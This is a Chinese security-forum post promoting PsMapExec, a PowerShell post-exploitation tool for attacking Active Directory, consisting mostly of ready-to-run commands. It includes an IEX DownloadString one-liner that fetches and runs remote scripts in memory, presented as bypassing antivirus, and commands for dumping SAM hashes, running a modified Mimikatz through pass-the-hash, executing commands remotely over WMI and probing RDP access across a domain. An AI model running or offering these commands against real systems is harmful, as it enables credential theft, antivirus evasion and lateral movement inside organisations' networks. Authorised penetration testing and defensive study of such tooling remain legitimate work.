安全矩阵

 找回密码
 立即注册
搜索
查看: 950|回复: 0

神器!Powershell版CrackMapExec

[复制链接]

179

主题

179

帖子

630

积分

高级会员

Rank: 4

积分
630
发表于 2023-9-24 13:10:24 | 显示全部楼层 |阅读模式
神器!Powershell版CrackMapExec

什么是PsMapExec

PsMapExec是深受CrackMapExec启发而用Powershell编写的一个后渗透利用工具,可用于评估和测试Active Directory环境。


支持哪些方法

当前支持的方法(协议)

  1. PsExec
  2. RDP
  3. SMB Signing
  4. WinRM
  5. WMI
复制代码



计划方法

  1. MSSQL (测试中)
  2. IPMI
  3. SNMP
  4. FTP
  5. SSH
复制代码




快速开始
将脚本直接加载到内存中(绕过 AV)

  1. IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PME-Scripts/main/Invoke-NETMongoose.ps1");IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1")
复制代码



将脚本直接加载到内存中

  1. IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1")
复制代码


检查所有域系统上的SMB签名

  1. PsMapExec -Targets All -GenRelayList
复制代码



通过WMI执行一些命令

  1. PsMapExec -Targets Servers -Username Admin -Password Pass -Method WMI -Command "net user"
复制代码




通过WinRM转储SAM并解析结果

  1. PsMapExec -Targets Servers -Username Admin -Password Pass -Method WinRM -Module SAM -Option Parse
复制代码






使用哈希通过WMI进行身份验证并执行mimikatz

  1. PsMapExec -Targets Workstations -Username Admin -Hash [Hash] -Method WMI -Module LogonPasswords -Option Parse -ShowOutput
复制代码




检查所有系统上的RDP访问

  1. PsMapExec -Targets All -Username Admin -Password Pass -Method RDP
复制代码





依赖关系
PsMapExec 有一些依赖项,需要从脚本本身外部提取才能运行,主要是:

  1. Kirby(基于PowerShell的Kerberos票证转储)
  2. Invoke-Pandemonium(稍作修改的Mimikatz)
复制代码



目前它们是从单独的GitHub存储库中提取的,如果您在没有外部访问权限的环境中工作或者GitHub被防火墙阻止,您将需要将存储库中的脚本克隆到运行PsMapExec的系统上。

  1. https://github.com/The-Viper-One/PME-Scripts
复制代码



PsMapExec当前不为这些托管HTTP服务器,因此您需要使用HFS之类的东西:https://www.rejetto.com/hfs/?f=dl,支持指向本地或替代托管服务器来获取脚本依赖项。

  1. PsMapExec -Targets All -Username [User] -Password [Pass] -LocalFileServer [IP]
复制代码





详细使用方法

  1. https://viperone.gitbook.io/pentest-everything/psmapexec
  2. https://viperone.gitbook.io/pentest-everything/psmapexec/using-credentials
  3. https://viperone.gitbook.io/pentest-everything/psmapexec/methods
  4. https://viperone.gitbook.io/pentest-everything/psmapexec/modules
  5. https://viperone.gitbook.io/pentest-everything/psmapexec/spray
复制代码




下载地址
https://github.com/The-Viper-One/PsMapExec



本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 07:41 , Processed in 0.015263 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表